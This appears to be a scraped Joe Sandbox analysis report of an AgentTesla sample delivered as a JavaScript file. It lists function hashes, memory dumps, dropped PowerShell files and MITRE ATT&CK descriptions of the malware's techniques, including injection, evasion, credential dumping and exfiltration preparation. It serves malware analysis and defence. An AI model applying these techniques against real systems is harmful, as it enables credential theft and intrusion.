Opcode ID: dbeada5f25f858294638cd5d5b738aafcd428c8c687aa8205c7f8e687a7758b5
Instruction ID: ce873875fa7a8d9dbf8c901251baa4d5c8a7039ad64a718a7f58b2fed26911d4
Opcode Fuzzy Hash: dbeada5f25f858294638cd5d5b738aafcd428c8c687aa8205c7f8e687a7758b5
Instruction Fuzzy Hash: EE11C430B10A515FCBA5EA7C9450A2E77E6EBCA660F10842EE51AC7381DA26DC1283D5

Function 066C3EB7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aefdf7772c4daddd34408115bafc2cbab4540c3f474d50ae8ef5330343920c4
Instruction ID: ad497826fafd4c70c3d9e977a13e1de3db09484ce149c05b6d202680f1b1a675
Opcode Fuzzy Hash: 9aefdf7772c4daddd34408115bafc2cbab4540c3f474d50ae8ef5330343920c4
Instruction Fuzzy Hash: 9301F131B106610FDB60967DD81472BB7EAEBCA624F14C87EF10AD7346EA55CC028391

Function 066CA3D1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9bdf5121f03de4c155a5f9141dea144ffcf778085992c32001d647bf90ecbb4
Instruction ID: 3eac480767d02b456885ea287a8235aa79b2cc6fdc6a87b3fcd82feae45a653f
Opcode Fuzzy Hash: a9bdf5121f03de4c155a5f9141dea144ffcf778085992c32001d647bf90ecbb4
Instruction Fuzzy Hash: 5301D430B116245FCB5196BCE86476BB7D6EB86720F10C429F50EC7345DE25DC0987D1

Function 066C3C71 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a14648a31008a0f23156f14364840b50ca56707f3da442c897f09e608dde076
Instruction ID: 850cfdaf004d0211cfc9b8087641608ad7860115bb3b0e700c60dab6ada6e17b
Opcode Fuzzy Hash: 4a14648a31008a0f23156f14364840b50ca56707f3da442c897f09e608dde076
Instruction Fuzzy Hash: 6E018436B101295BDB949578DC156EF77AFDBC9620F008539D906E3340EE618C4247E2

Function 066C3939 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcbfef2ad22462929fa38c2cadc448c51a621793b717e2c20307f6b21fad9bcf
Instruction ID: 5a6a7b5147b05f0abf343eb45af02739de4d63feade0b29946dc20de33548f52
Opcode Fuzzy Hash: dcbfef2ad22462929fa38c2cadc448c51a621793b717e2c20307f6b21fad9bcf
Instruction Fuzzy Hash: D32122B1C01659AFCB10DF9AD884ADEFBB4FB48320F10812AE918B3300D774A954CFA4

Function 0113D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2699283355.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_113d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5598050a76b1bbb03a66d3720a50d8acb638a64c40f8b375dc4a1e083d93ad6
Instruction ID: 8e25b9f4a24bbaac26b417d66ac254deee1891c593c8a05003bdd9ff507ef81f
Opcode Fuzzy Hash: e5598050a76b1bbb03a66d3720a50d8acb638a64c40f8b375dc4a1e083d93ad6
Instruction Fuzzy Hash: E111BB75504284CFCB16CF64D9C4B15FBA2FB84324F28C6A9D8494B656C33AD44ACF62

Function 066C3940 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b46f6e5ec1174cb22f10d88b9854f570282cd6f35c6c9de9f836aeaf5adfac20
Instruction ID: 328cabe1ddb2415c890674d8201b8288e2876b59d71ddcd7778ecd492e568eb1
Opcode Fuzzy Hash: b46f6e5ec1174cb22f10d88b9854f570282cd6f35c6c9de9f836aeaf5adfac20
Instruction Fuzzy Hash: 7A11FFB1D01259AFCB00DF9AD884ADEFBB4FB48720F10812AE918B7300D374A944CFA4

Function 066C3EC8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f53c566c6f84cebba3dd4c1f1a41e0ea13ad2412eb4285c2a3762a6784a4e4
Instruction ID: 6863e5af8f184c3685f772086b564e0ab85135ee1768d63b99e71d462125252b
Opcode Fuzzy Hash: c7f53c566c6f84cebba3dd4c1f1a41e0ea13ad2412eb4285c2a3762a6784a4e4
Instruction Fuzzy Hash: CE016931B105214FDBA4966DE41072BB2EBEBCAA64F20C83EF10AD7345DA66DC024395

Function 066CEE70 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dca529c299253ec4bc8a06a384635b4c1f62ddae8c1738d0daf673cd51cab5e
Instruction ID: d16d76f94b18b4d6ce20a4c9bfe87957914a4be1bf08c98c76878fcf75ea31e7
Opcode Fuzzy Hash: 0dca529c299253ec4bc8a06a384635b4c1f62ddae8c1738d0daf673cd51cab5e
Instruction Fuzzy Hash: 75013C31B109215BDBA5A66CD49073F76EBEBCD6A0F20882DE50AC7340EE26DC0643D9

Function 066CA3E0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fbc2fe4f8ff5864dffcb686da5017d5639a1aa05631f07c2041437ca82ba76a
Instruction ID: 679cda7e1df306b89fc887aab6214031b4aa680909f8a4358c62bde5ac97b2d1
Opcode Fuzzy Hash: 3fbc2fe4f8ff5864dffcb686da5017d5639a1aa05631f07c2041437ca82ba76a
Instruction Fuzzy Hash: 29018130B105254FDB90DAACD45472AB3D6EB89724F10C82DE50EC7748DE21DC458780

Function 066CAFE8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08968574da6a08aec2552bb5459046e7f1e3533dab3b78d646fc65a3918b8834
Instruction ID: 9d11cc066c910c941e6e23e2a523d4894718c247a56d30ef302945e183bcd7e2
Opcode Fuzzy Hash: 08968574da6a08aec2552bb5459046e7f1e3533dab3b78d646fc65a3918b8834
Instruction Fuzzy Hash: 77012831F102198BDF649A6CD5427AEBBB9E745334F00443ED92AD7340D631DC4587D1

Function 066C6540 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d590fb61ec9f544456df50b988d867b3b8cf659ff0a843152f201d498b0f31a
Instruction ID: aaaa390c48d2a7d6481b8a98ea46c8006bac1957cfabb7c6573bc491c59351b1
Opcode Fuzzy Hash: 5d590fb61ec9f544456df50b988d867b3b8cf659ff0a843152f201d498b0f31a
Instruction Fuzzy Hash: D4E09230D15248BFDB60DEB4C94566B7BB8DB02254F3048AAD448CB243E536CE018754

Function 066C4709 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69a7740ad0307566e50b7ed0d6413815025334edb707743945a9e3e750315649
Instruction ID: 0f9ca4878eb0943cbc6b205f0537fc79cc3a41f94bc4be536182014dd4a35159
Opcode Fuzzy Hash: 69a7740ad0307566e50b7ed0d6413815025334edb707743945a9e3e750315649
Instruction Fuzzy Hash: 8BF0FE34A20229DFDB54DF90E8687BDBBB2FF88710F204519E502A7394CB741C46DB94

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

Networking

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2galabz2.wqr.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lliqdzx1.2rq.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqr03okw.j0s.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqt2f2g2.wq0.ps1

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js

Function 00007FFB4AD97A01 Relevance: 1.8, APIs: 1, Instructions: 319
processCOMMON

Function 00007FFB4AD9833D Relevance: 1.7, APIs: 1, Instructions: 212
injectionCOMMON

Function 00007FFB4AD97E39 Relevance: 1.7, APIs: 1, Instructions: 187
threadCOMMON

Function 00007FFB4AD98529 Relevance: 1.6, APIs: 1, Instructions: 136
threadCOMMON

Function 00007FFB4AE629E9 Relevance: 1.1, Instructions: 1127
COMMON

Function 00007FFB4AE6099E Relevance: .2, Instructions: 231
COMMON

Function 00007FFB4AE60CDE Relevance: .2, Instructions: 155
COMMON

Function 00007FFB4AE609EA Relevance: .1, Instructions: 149
COMMON

Function 00007FFB4AE628FC Relevance: .1, Instructions: 121
COMMON

Function 00007FFB4AE61F9A Relevance: .1, Instructions: 111
COMMON

Function 00007FFB4AE6225A Relevance: .1, Instructions: 109
COMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre